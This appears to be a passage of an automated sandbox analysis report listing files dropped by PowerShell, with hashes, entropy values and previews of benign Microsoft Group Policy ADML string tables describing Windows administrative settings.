                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DefaultLogonDomain">Assign a default domain for logon</string>.. <string id="DefaultLogonDomain_Help">This policy setting specifies a default logon domain, which might be a different domain than the domain to which the computer is joined. Without this policy setting, at logon, if a user does not specify a domain for logon, the domain to which the computer belongs is assumed as the default domain. For example if the computer belongs to the Fabrikam domain, the default domain for user logon is Fabrikam. ....If y

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\CtrlAltDel.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (353), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3490
                                                                                                                                                                                                        Entropy (8bit):4.799993012083926
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKwZJBaoC9DxBboMEBar+Nc456uFDPrJNBFiy4jyDznyHSMrmdzcFV:LeD5pm8ZJjQDxXONcOXNB9HyHbrvFV
                                                                                                                                                                                                        MD5:8EB6CBECFCFB7FB15E453E235713F0D2
                                                                                                                                                                                                        SHA1:37170BA6139BD471C4121ED7747E8C9544E64E4A
                                                                                                                                                                                                        SHA-256:23EAF2144B343ACCE5EC33DFB0363BA5B53E1ED8F5E0557F7597F02C1A659B0C
                                                                                                                                                                                                        SHA-512:F3B96C2721592E9C5CD8CAF20DACCAE170B46BDBBBD24D4A6D1ACC3CA3D10BFA9AC23DA2B5B3F9CF7D9F7918236C1C686918BB392595C634E97B56070AEDE007
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CADOptions">Ctrl+Alt+Del Options</string>.. <string id="DisableChangePassword">Remove Change Password</string>.. <string id="DisableChangePassword_Help">This policy setting prevents users from changing their Windows password on demand.....If you enable this policy setting, the 'Change Password' button on the Windows Security dialog box will not appear when you press Ctrl+Alt+Del.....However, users are still able to change their password when prompted by the system. The system prompts users for a new pass

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DCOM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (507), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5072
                                                                                                                                                                                                        Entropy (8bit):4.789995597871682
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmc4qzQuQ+kCO+QW9JvqIiErBAqHPkGitHqEJw2mL8ykL3/NBV:El4qE9+kCOtW9dqIiErBAgPk/tKEJw2D
                                                                                                                                                                                                        MD5:7DF9E61D5F72660A48741A9D1AE6DF2A
                                                                                                                                                                                                        SHA1:A623BD2021EAA8863519E110E2C4D141D68E6DEE
                                                                                                                                                                                                        SHA-256:BD0E69BF353115E23B4344875DA15DF78BD4ADF676EEAB35AED30A21C129EBED
                                                                                                                                                                                                        SHA-512:726FC2BD5444E1791811C9F39B3B535D155AA0BA2AC8B50F7A8B6FAF48E7BEDBD542C96C701A1CD58B1C89B89DA04D9C175E9CCDE70DA27C92E073E570138DD1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DCOM">Distributed COM</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList">Allow local activation security check exemptions</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList_Explain">Allows you to specify that local computer administrators can supplement the "Define Activation Security Check exemptions" list.....If you enable this policy setting, and DCOM does not find an explicit entry for a DCOM server application id (appid) in the "Define Activation Security Check exemptions

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DFS.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1550
                                                                                                                                                                                                        Entropy (8bit):4.934966284712348
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yAyjP9jlFxUy3QviR0IhjV:cgeD5x8gm8fK0jlFxUM7FV
                                                                                                                                                                                                        MD5:59649458234FA8EC0FA1CCF6D1A1F000
                                                                                                                                                                                                        SHA1:FA84DC8C633AC66D93C2CC4CA82973690CC01B06
                                                                                                                                                                                                        SHA-256:7C621BDFA9AAFBB72C6E3EAA6BD9DADB9B87B76FF3085C3AB85F94A4BA74148B
                                                                                                                                                                                                        SHA-512:3DAC7345CDF6E474EC6550890D2581E97CECCBDF3D6DA446D0B4051600B81E66725E20E3905FC8ED051E00AE74B7899ECEC073C828E776FB664731218F88E528
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DFSDiscoverDC">Configure how often a DFS client discovers domain controllers</string>.. <string id="DFSDiscoverDC_Help">This policy setting allows you to configure how often a Distributed File System (DFS) client attempts to discover domain controllers on a network. By default, a DFS client attempts to discover domain controllers every 15 minutes.....If you enable this policy setting, you can configure how often a DFS client attempts to discover domain controllers. This value is specified in minutes.....If you

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DWM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4823
                                                                                                                                                                                                        Entropy (8bit):4.829103521253636
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm8i9yPYwH70day2JGkA5mZAOtfMtlV:E1i9Yn0zMA3G6
                                                                                                                                                                                                        MD5:8C0C1F2AC3237B8AA71F88A5650C0E68
                                                                                                                                                                                                        SHA1:8A39FC535339841CC7573B1DCFF729CEC8E54114
                                                                                                                                                                                                        SHA-256:844BF77E54E0C353537B0D1349F0173049DD36C0CB64EAEE900663CD0A227AB4
                                                                                                                                                                                                        SHA-512:C6F8AC395D011EC45EBF47812EBEBF7E152DB6A943566B744AA83B22529DF07E3D0749D008B5F3A8A46953CCCF39305966869E5EFE502B1E727CF55ED7A05F4F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CAT_DesktopWindowManager">Desktop Window Manager</string>.. <string id="CAT_DesktopWindowManagerColorization">Window Frame Coloring</string>.. <string id="DwmDefaultColorizationColor">Specify a default color</string>.. <string id="DwmDefaultColorizationColorExplain">This policy setting controls the default color for window frames when the user does not specify a color. ....If you enable this policy setting and specify a default color, this color is used in glass window frames, if the user does not sp

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Desktop.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22651
                                                                                                                                                                                                        Entropy (8bit):4.740040645096249
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:sHlNSiouVHqVHdjZjfYBi1lkmX15/5GYyr2cci:qNSiVs9jBwBiHk0v/5Grrh
                                                                                                                                                                                                        MD5:3B0954050C6DFF90CAE771936C61F536
                                                                                                                                                                                                        SHA1:5D6D1097DE13011B78271272B87DE55C2BFFCEA8
                                                                                                                                                                                                        SHA-256:F8DA2C6952EBABA7C70F5BB5941532A2E6112955E3E340F003581E96BB7B0881
                                                                                                                                                                                                        SHA-512:097C9E8A0B5BC0B97777F6A591E7CEF5A2362668B05C42624593069FD4F2E6279EA8D83CBCADA7C973E9E1CCED78B1149889A333021FA904A23BF0D6FBEC06FC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDesktop">Desktop</string>.. <string id="ActiveDirectory">Active Directory</string>.. <string id="AD_EnableFilter">Enable filter in Find dialog box</string>.. <string id="AD_EnableFilter_Help">Displays the filter bar above the results of an Active Directory search. The filter bar consists of buttons for applying additional filters to search results.....If you enable this setting, the filter bar appears when the Active Directory Find dialog box opens, but users can hide it.....If you disable this

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DeviceCompat.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1012
                                                                                                                                                                                                        Entropy (8bit):5.014566400985145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFMNWe2PEYLdFV:cgeD5x8gm8fKOE+FV
                                                                                                                                                                                                        MD5:8C5BFC23602CF18E6EC73BDF468C5C65
                                                                                                                                                                                                        SHA1:87C49103ECB11F3284DE1311D305CE426DA77573
                                                                                                                                                                                                        SHA-256:5FE3FC627DFAEDDEDDD5C617D4DDD1AB367353A97026268C27AB45B8A9025472
                                                                                                                                                                                                        SHA-512:ED4BF6B6D7F2F5B248DF14DAA85551613583E8DCFD734266E08296F0DCB52055A2CAD56C23DDFA20EA3315A9DD3B3D538EE673C89E97CFC8D5D9BE39BB575794
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceCompat">Device and Driver Compatibility</string>.. <string id="DeviceFlags">Device compatibility settings</string>.. <string id="DriverShims">Driver compatibility settings</string>.. <string id="DeviceFlags_Help">Changes behavior of Microsoft bus drivers to work with specific devices.</string>.. <string id="DriverShims_Help">Changes behavior of 3rd-party drivers to work around incompatibilities introduced between OS versions.</string>.. </stringTable>.. </resources>..</policyDefinition

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DeviceInstallation.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (671), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20516
                                                                                                                                                                                                        Entropy (8bit):4.656487634133671
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:/Zy2dT4b3O+5KeqO+cpm964BNLKsuV2r4tFHsAvRzw3g:/ZBub+EKebxpm97ODVy4rHb5EQ
                                                                                                                                                                                                        MD5:B0D80E37838946A958789511D6090800
                                                                                                                                                                                                        SHA1:E80EBC94D870B40E9925D9473E83438287A3DF50
                                                                                                                                                                                                        SHA-256:EAD0368B0AB7404ADDC0B8BD016E04D43C7A1E370A2875A6785863A53CC94095
                                                                                                                                                                                                        SHA-512:A13D7AA56FA39803B8CB441DD6907A0F06E2B89EB478B6C6D57687F0E154DE44EF959411627C33D5652D096E439F6518C624A4F159189C8DA7AD51370FB12AD3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_AllowAdminInstall">Allow administrators to override Device Installation Restriction policies</string>.. <string id="DeviceInstall_AllowAdminInstall_Help">This policy setting allows you to determine whether members of the Administrators group can install and update the drivers for any device, regardless of other policy settings.....If you enable this policy setting, members of the Administrators group can use the Add Hardware wizard or the Update Driver wizard to install and update the drivers for

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DeviceSetup.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8722
                                                                                                                                                                                                        Entropy (8bit):4.755555827203055
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm90hTxQOL2iYoQkdN+Rn+kJu+G6f9Yh3VfPtvCchfvaCz+51qMnHV:EbTmUvQkdN+F+au+G6etntbz+5su
                                                                                                                                                                                                        MD5:9E7C326DCCFD5BDAE53F0FF7359042CF
                                                                                                                                                                                                        SHA1:BFC33D23A42406EF057AC21BCECA4310C256C901
                                                                                                                                                                                                        SHA-256:4E1BC9FDA548EEBF29A499B61CE0462983DD461DB84F4B2C63150636B917036B
                                                                                                                                                                                                        SHA-512:96C937F5F6871D7BD0F3FDF0B6D502232C29C6E77DE7B1FD0A79DB4ADBC7EAAFBC0A60C76C8AF6D5D85CA7397A4C995BE385320C64D23076A7658C1B1187A624
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_BalloonTips">Turn off "Found New Hardware" balloons during device installation</string>.. <string id="DeviceInstall_BalloonTips_Help">This policy setting allows you to turn off "Found New Hardware" balloons during device installation.....If you enable this policy setting, "Found New Hardware" balloons do not appear while a device is being installed.....If you disable or do not configure this policy setting, "Found New Hardware" balloons appear while a device is being installed, unless the driver

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DigitalLocker.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1186
                                                                                                                                                                                                        Entropy (8bit):5.006514157459994
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEgDfJvRl9xCRMRq9MXJz1c2igRE3RwMwFxRjX/5Ron:cgeD5x8gm8fKqTtW9M71ibKMFV
                                                                                                                                                                                                        MD5:A4EECA9FC18FD2F595ECC98FD40E0F5F
                                                                                                                                                                                                        SHA1:EFBAB95F94C418BE4B025F3CA14BA3441C1D7CE8
                                                                                                                                                                                                        SHA-256:348B0A60BCA267759CA52611C67B06AB3347CAB23786C257D984EB7F3F94C6A2
                                                                                                                                                                                                        SHA-512:11A2FB546E64CA105CE63E313FCDDE0950939C5981BEEC4D04CEB0C0C43EB573CC3C5444E71BBD12AD04A902CB4D3FC7C41EB4E9BA601232041716CEE0835622
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Digitalx_DiableApplication_TitleText">Do not allow Digital Locker to run</string>.. <string id="Digitalx_DisableApplication_DescriptionText">Specifies whether Digital Locker can run.....Digital Locker is a dedicated download manager associated with Windows Marketplace and a feature of Windows that can be used to manage and download products acquired and stored in the user's Windows Marketplace Digital Locker.....If you enable this setting, Digital Locker will not run.....If you disable or do not configure this

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DiskDiagnostic.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (349), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4016
                                                                                                                                                                                                        Entropy (8bit):4.799918196062888
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmNIlyc4TNq1nCsXGT1fnC7SqnBU+l4vnjzyJ1nCsXGT1fnWmoV:EeIlyc4TN0psngSUG+l4vnjzy3psnWP
                                                                                                                                                                                                        MD5:98FB5567E5194E5E7430C553FD07EE50
                                                                                                                                                                                                        SHA1:9CD9DE9B3E9FAD928DCBB73225B7F77B21D7F532
                                                                                                                                                                                                        SHA-256:3EE2D33B8C14490D4315F669873B1E4747EF4C99CF83CB3214FBE02774DF322D
                                                                                                                                                                                                        SHA-512:2DC8749CB1E401E4A7753933861081D80AB9D11D349730289E36FD59EF3F76CFCE63AC71864B7239C05CFAD12F89D7991F1AA79E78751F926A941F82EADD23C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. BEGIN: Custom supportedOn strings -->.. <string id="SUPPORTED_WindowsLonghornServerDesktopExperienceOrVista">.. Windows Server 2008 with Desktop Experience installed or Windows Vista.. </string>.. END: Custom supportedOn strings -->.. <string id="DfdAlertPolicy">Disk Diagnostic: Configure custom alert text</string>.. <string id="DfdAlertPolicyExplain">This policy setting substitutes custom alert text in the disk diagnostic message shown to users when a disk reports a S.M.A.R.T. f

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DiskNVCache.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4247
                                                                                                                                                                                                        Entropy (8bit):4.68691343915682
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm+vfC9KJ5V/MztbEUiTKD48mRCjme9E5J9eWFV:EJN/MdEUiTKs8mwM8Wn
                                                                                                                                                                                                        MD5:74FF3350EF82B0E11EF64C762CF28BE3
                                                                                                                                                                                                        SHA1:8D7BB871CC583EB03E3E104FDC50FCBC974527EB
                                                                                                                                                                                                        SHA-256:D94738C802A64BDA9CCA3947096A97B4DAC05730BD55441ED552595422103A9F
                                                                                                                                                                                                        SHA-512:0729601AD1E861F7DA3E39ECC3878A37AFA3E37C92924446B28FA6BDFB4189D024B7F4E5CE0BF29FE4EB3B51DFA98FE07B7A560DDC521FBDAB4E50EA6C6160C2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootResumePolicy">Turn off boot and resume optimizations</string>.. <string id="BootResumePolicyHelp">This policy setting turns off the boot and resume optimizations for the hybrid hard disks in the system.....If you enable this policy setting, the system does not use the non-volatile (NV) cache to optimize boot and resume.....If you disable this policy setting, the system uses the NV cache to achieve faster boot and resume. The system determines the data that will be stored in the NV cache to optimize boot an

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DiskQuota.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (382), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9312
                                                                                                                                                                                                        Entropy (8bit):4.685669628790155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmUA7x7OOWbm7kiE7EC/8GxKU0zOZqIc5fKSuBGfvbKqbKJajDrSy5G+YGmI:EOpKz98U0CgfKSFnWqBXrjksmw03Tja
                                                                                                                                                                                                        MD5:40CA6688DCC63C37ADC92B8CE44A47E1
                                                                                                                                                                                                        SHA1:584E5E4433F642B09081A68167436F41D3615867
                                                                                                                                                                                                        SHA-256:9EA35D39FAB49421022E213BE5B8A66404B41BEB2202E17C94BF557FB8C349C4
                                                                                                                                                                                                        SHA-512:7711A24BE790431495051BAE7DA407FA961748374C0936CB49FD4F421425C4D92458C5F8E2C356E70923EB91D0DE100D6EB7F401D2EF03A18DD590F7FEF8314A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DiskQuota">Disk Quotas</string>.. <string id="DQ_Enable">Enable disk quotas</string>.. <string id="DQ_Enable_Help">This policy setting turns on and turns off disk quota management on all NTFS volumes of the computer, and prevents users from changing the setting.....If you enable this policy setting, disk quota management is turned on, and users cannot turn it off.....If you disable the policy setting, disk quota management is turned off, and users cannot turn it on.....If this policy setting is not config

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DistributedLinkTracking.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (575), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1218
                                                                                                                                                                                                        Entropy (8bit):4.961559763430255
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQJmjI7JMHkJNMLsDe7MBMZc1zcqoFV:cgeD5x8gm8fKxmEPnMLkeKMokFV
                                                                                                                                                                                                        MD5:8B49ABCA606DF290D14944330F11A796
                                                                                                                                                                                                        SHA1:5FD7496C8553485972A7B35E75386A0CB98199AF
                                                                                                                                                                                                        SHA-256:25D3882376CC864E14BF8CBD16065971C8C5F1C88FCEF7C60B4213604F893272
                                                                                                                                                                                                        SHA-512:F7C3B0CE37F00F281DCDF46A421295D2CD79298852B2302624CD4AFD27EED160FFB4B9003C2096851DD884E8708000282D55876CFC1FA853DCB437FA65D3F8F3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DLT_AllowDomainMode">Allow Distributed Link Tracking clients to use domain resources</string>.. <string id="DLT_AllowDomainMode_Explain">Specifies that Distributed Link Tracking clients in this domain may use the Distributed Link Tracking (DLT) server, which runs on domain controllers. The DLT client enables programs to track linked files that are moved within an NTFS volume, to another NTFS volume on the same computer, or to an NTFS volume on another computer. The DLT client can more reliably track links

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\DnsClient.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (896), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):31344
                                                                                                                                                                                                        Entropy (8bit):4.717542963262439
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:zlbkZcHOReR932i5D5Zbng2C5stOeoXYaYENfOenLtWeoXYaYENfwleyLLhbxEHq:u5XYlXYfleQlnzmW
                                                                                                                                                                                                        MD5:7B88F32185E7AEE9D215D367F531C628
                                                                                                                                                                                                        SHA1:086E5D851CBD967E907A54539DA3DE95F2F53916
                                                                                                                                                                                                        SHA-256:A60EA72F20C54DC7362CB26A10970B4BEDAC5E257E20317BD2CACA1E289DB08D
                                                                                                                                                                                                        SHA-512:70CF1A3642D0C6D6866B713DE7A52857CB550C6490B8C62A9605BEFE3811525C3081DCE9DE9F881C361FE88694C256EB03EA168FD489BE9CB0AC48AE4F244BAE
                                                                                                                                                                                                        Malicious:false
